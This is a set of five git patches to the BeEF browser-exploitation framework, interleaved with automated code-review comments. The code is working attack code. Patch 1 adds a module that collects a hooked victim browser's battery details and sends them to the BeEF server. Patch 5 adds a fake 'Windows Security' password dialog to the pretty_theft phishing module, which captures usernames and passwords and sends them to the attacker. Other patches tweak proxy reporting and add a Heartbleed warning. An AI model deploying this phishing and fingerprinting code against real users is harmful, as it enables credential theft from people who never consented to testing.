From 6044de5604398cd6c9bb1ca375a751bbd23ae934 Mon Sep 17 00:00:00 2001
From: ecneladis
Date: Mon, 24 Mar 2014 12:46:43 +0100
Subject: [PATCH 1/5] Adding module for getting battery status
---
 modules/host/get_battery_status/command.js | 19 +++++++++++++++++++
 modules/host/get_battery_status/config.yaml | 16 ++++++++++++++++
 modules/host/get_battery_status/module.rb | 17 +++++++++++++++++
 3 files changed, 52 insertions(+)
 create mode 100644 modules/host/get_battery_status/command.js
 create mode 100644 modules/host/get_battery_status/config.yaml
 create mode 100644 modules/host/get_battery_status/module.rb
diff --git a/modules/host/get_battery_status/command.js b/modules/host/get_battery_status/command.js
new file mode 100644
index 000000000..470035d7a
--- /dev/null
+++ b/modules/host/get_battery_status/command.js
@@ -0,0 +1,19 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+beef.execute(function() {
+ var battery = navigator.battery || navigator.webkitBattery || navigator.mozBattery;
+
+ if (!battery) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "Unable to get battery status");
+ }
+
+ var chargingStatus = battery.charging;
+ var batteryLevel = battery.level * 100 + "%";
+ var chargingTime = battery.chargingTime;
+ var dischargingTime = battery.dischargingTime;
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "chargingStatus=" + chargingStatus + "&batteryLevel=" + batteryLevel + "&chargingTime=" + chargingTime + "&dischargingTime=" + dischargingTime);
+});
diff --git a/modules/host/get_battery_status/config.yaml b/modules/host/get_battery_status/config.yaml
new file mode 100644
index 000000000..fef745857
--- /dev/null
+++ b/modules/host/get_battery_status/config.yaml
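Review bot: In modules/host/get_battery_status/command.js the `if (!battery)` branch sends the failure message but does not return, so execution continues to `battery.charging` on an undefined value and throws a TypeError. Add `return;` as the last statement inside that branch, after the `beef.net.send(...)` call. A one-line comment above the `var battery = ...` line, such as `// Battery Status API: unprefixed, then WebKit- and Gecko-prefixed fallbacks`, would also explain why three properties are probed.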
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ get_battery_status:
+ enable: true
+ category: "Host"
+ name: "Get Battery Status"
+ description: "Get informations of the victim current battery status"
+ authors: ["ecneladis"]
+ target:
+ working: ["FF"]
+ not_working: ["All"]
diff --git a/modules/host/get_battery_status/module.rb b/modules/host/get_battery_status/module.rb
new file mode 100644
index 000000000..3f6271a13
--- /dev/null
+++ b/modules/host/get_battery_status/module.rb
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_battery_status < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['chargingStatus'] = @datastore['chargingStatus']
+ content['batteryLevel'] = @datastore['batteryLevel']
+ content['chargingTime'] = @datastore['chargingTime']
+ content['dischargingTime'] = @datastore['dischargingTime']
+ save content
+ end
+
+end
From d9fd2b994efb45989b48b48f8a1ae4aa98f5306a Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sun, 13 Apr 2014 02:29:09 +1000
Subject: [PATCH 2/5] Add browser proxy details to browser summary
---
 extensions/admin_ui/controllers/modules/modules.rb | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 79faddb6f..f3fb6ed04 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
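Review bot: `post_execute` in modules/host/get_battery_status/module.rb stores four `@datastore` values without checking them, and nothing in the class records where they come from. They are presumably the fields that command.js reports from the remote browser, so they should be treated as untrusted input when `save content` runs. On the "Unable to get battery status" path all four keys are likely absent and saved as nil. A comment above the method such as `# Values are reported by the remote browser and saved unvalidated; escape before display.` would document that. The four assignments could also be written once as `%w[chargingStatus batteryLevel chargingTime dischargingTime].each { |k| content[k] = @datastore[k] }`.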
@@ -72,6 +72,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
 ['Browser', 'Browser Language', 'BrowserLanguage'],
 ['Browser', 'Browser Platform', 'BrowserPlatform'],
 ['Browser', 'Browser Plugins', 'BrowserPlugins'],
+ ['Browser', 'Using Proxy', 'UsingProxy'],
+ ['Browser', 'Proxy Client', 'ProxyClient'],
+ ['Browser', 'Proxy Server', 'ProxyServer'],
 ['Browser', 'Window Size', 'WindowSize'],
 # Browser Components
From 5d1d519fc2e74bcf9798a07f50404737946608ba Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sun, 13 Apr 2014 02:31:52 +1000
Subject: [PATCH 3/5] unless proxy_clients.empty? replace `unless proxy_clients.nil?` with `unless proxy_clients.empty?`
---
 core/main/handlers/browserdetails.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 6187a3794..fe0f4c6c4 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -119,7 +119,7 @@ module BeEF
 if using_proxy == true
 BD.set(session_id, 'UsingProxy', "#{using_proxy}")
 proxy_log_string = "#{zombie.ip} is using a proxy"
- unless proxy_clients.nil?
+ unless proxy_clients.empty?
 BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
 proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
 end
From f526f39f1015a72d506aa9d296323a31a64c25da Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sun, 13 Apr 2014 03:33:32 +1000
Subject: [PATCH 4/5] Warn about Heartbleed if opemnssl is vulnerable Warn user if the OpenSSL library is vulnerable to Heartbleed and HTTPS is enabled. Part of #990
---
 core/main/server.rb | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/core/main/server.rb b/core/main/server.rb
index b4530ad07..e82c9dc4a 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
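Review bot: Replacing `proxy_clients.nil?` with `proxy_clients.empty?` in core/main/handlers/browserdetails.rb removes the nil guard, so if `proxy_clients` can still be nil here the call raises NoMethodError inside the handler. The assignment of `proxy_clients` is outside the hunk, so whether nil is possible cannot be confirmed from these lines. `unless proxy_clients.nil? || proxy_clients.empty?` covers both cases. The expression `proxy_clients.sort.uniq.join(',')` is evaluated twice in the following two lines and could be held in a local.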
@@ -108,6 +108,11 @@ module BeEF
 @rack_app)
 if @configuration.get('beef.http.https.enable') == true
+ openssl_version = OpenSSL::OPENSSL_VERSION
+ if openssl_version =~ / 1\.0\.1([a-f])/
+ print_error "Warning: #{openssl_version} is vulnerable to Heartbleed (CVE-2014-0160)."
+ print_more "Upgrade OpenSSL to version 1.0.1g or newer."
+ end
 @http_server.ssl = true
 @http_server.ssl_options = {:private_key_file => $root_dir + "/" + @configuration.get('beef.http.https.key'),
 :cert_chain_file => $root_dir + "/" + @configuration.get('beef.http.https.cert'),
From 5ddb88db739beb1c1807081e74e650abaa5ea28c Mon Sep 17 00:00:00 2001
From: RootPrivileges
Date: Mon, 14 Apr 2014 10:23:30 +0100
Subject: [PATCH 5/5] Add a Windows prompt to the pretty_theft module
---
 .../pretty_theft/command.js | 59 +++++++++++++++++--
 .../social_engineering/pretty_theft/module.rb | 2 +-
 2 files changed, 54 insertions(+), 7 deletions(-)
diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js
index bceffee04..93c6c2e92 100644
--- a/modules/social_engineering/pretty_theft/command.js
+++ b/modules/social_engineering/pretty_theft/command.js
@@ -77,9 +77,9 @@ beef.execute(function() {
 // Check whether the user has entered a user/pass and pressed ok
 function checker(){
- uname1 = document.body.lastChild.getElementsByTagName("input")[0].value;
- pass1 = document.body.lastChild.getElementsByTagName("input")[1].value;
- valcheck = document.body.lastChild.getElementsByTagName("input")[3].value;
+ uname1 = document.getElementById("uname").value;
+ pass1 = document.getElementById("pass").value;
+ valcheck = document.getElementById("buttonpress").value;
 if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") {
 // Join user/pass and send to attacker
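Review bot: The pattern `/ 1\.0\.1([a-f])/` in core/main/server.rb requires a letter suffix, so the unsuffixed 1.0.1 release, which CVE-2014-0160 also affects, produces no warning; `/ 1\.0\.1[a-f]?\b/` covers 1.0.1 through 1.0.1f and still excludes 1.0.1g. `OpenSSL::OPENSSL_VERSION` reports the version the Ruby extension was built against, which can differ from the library loaded at run time (`OpenSSL::OPENSSL_LIBRARY_VERSION` gives that where the Ruby in use provides it). Distributions that backport the fix keep the old version string, so "may be vulnerable" is the more accurate wording for the message. The capture group is unused, and the enclosing method begins and ends outside the hunk.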
@@ -94,9 +94,9 @@ beef.execute(function() {
 $j('#darkenScreenObject').remove();
 }else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){
- // If user has not entered any data reset button
- document.body.lastChild.getElementsByTagName("input")[3].value = "false";
- alert("Please enter a valid username and password.");
+ // If user has not entered any data, reset button
+ document.body.lastChild.getElementById("buttonpress").value = "false";
+ alert("Please enter a valid username and password.");
 }
 }
@@ -163,6 +163,51 @@ beef.execute(function() { credgrabber = setInterval(checker,1000); } + // Windows floating div + function windows() { + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'popup'); + sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:#ffffff;border-radius:6px;'); + document.body.appendChild(sneakydiv); + + // Set appearance using styles, maybe cleaner way to do this with CSS block? + + // Set window border + var edgeborder = 'style="border:1px #000000 solid;border-radius:6px;"'; + var windowborder = 'style="width:400px;border: 7px #CFE7FE solid;border-radius:6px;"'; + + var windowmain = 'style="border:1px #000000 solid;"'; + + var titlebarstyle = 'style="background:#CFE7FE;height:19px;font-size:12px;font-family:Segoe UI;"'; + var titlebartext = 'Windows Security'; + + var promptstyle = 'style="height:40px;"'; + var titlestyle = 'style="align:left;font-size:14px;font-family:Segoe UI;margin:10px 15px;line-height:100%;color:0042CE;"'; + var title = 'Enter Network Password'; + var bodystyle = 'style="align:left;font-size:11px;font-family:Segoe UI;margin:10px 15px;line-height:170%;"'; + var body = 'Enter your password to connect to the server'; + var dividestyle = 'style="border-bottom:1px solid #DFDFDF;height:1px;width:92%;margin-left:auto;margin-right:auto;"'; + + var tablestyle = 'style="background:#CFE7FE;width:90%;margin-left:auto;margin-right:auto;border:1px solid #84ACDD;border-radius:6px;height:87px"'; + var logobox = 'style="border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff"'; + var logo = 'style="border:1px #000000 solid;height:43px;width:42px;background:#CFE7FE;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#EEF2F4, endColorstr=#CCD8DF);background: -webkit-gradient(linear, left top, left bottom, from(#ffffff), to(#CFE7FE));background: -moz-linear-gradient(top, #EEF2F4, #CCD8DF);"'; + + var inputboxstyle = 
'style="width:140px;font-size:11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#666666;color:#000000;border-radius:3px;"'; + + var credstextstyle = 'style="font-size:11px;font-family:Segoe UI;"'; + + var buttonstyle = 'style="font-size: 13px;background:#069;color:#000000;border: 1px #29447e solid;padding: 3px 3px 3px 3px;margin-right:5px;border-radius:5px;width:70px;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#ffffff, endColorstr=#CFCFCF);background: -webkit-gradient(linear, left top, left bottom, from(#ffffff), to(#CFCFCF));background: -moz-linear-gradient(top, #ffffff, #CFCFCF);"'; + var buttonLabel = ''; + + var bbarstyle = 'style="background-color:#F0F0F0;padding:8px;text-align:right;border-top: 1px solid #DFDFDF;height:28px;margin-top:10px;"'; + + // Build page including styles + sneakydiv.innerHTML= '
' +titlebartext+ '

' +title+ '
' + body + '

Remember my credentials
' + '
' +buttonLabel+ '
'; + + // Repeatedly check if button has been pressed + credgrabber = setInterval(checker,1000); + } + // YouTube floating div function youtube() { @@ -252,6 +297,8 @@ beef.execute(function() { facebook(); break; case "LinkedIn": linkedin(); break; + case "Windows": + windows(); break; case "YouTube": youtube(); break; case "Yammer": diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb index 0cff38b2f..18c656365 100644 --- a/modules/social_engineering/pretty_theft/module.rb +++ b/modules/social_engineering/pretty_theft/module.rb @@ -10,7 +10,7 @@ class Pretty_theft < BeEF::Core::Command proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" logo_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png" return [ - {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, + {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Windows'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true }, {'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },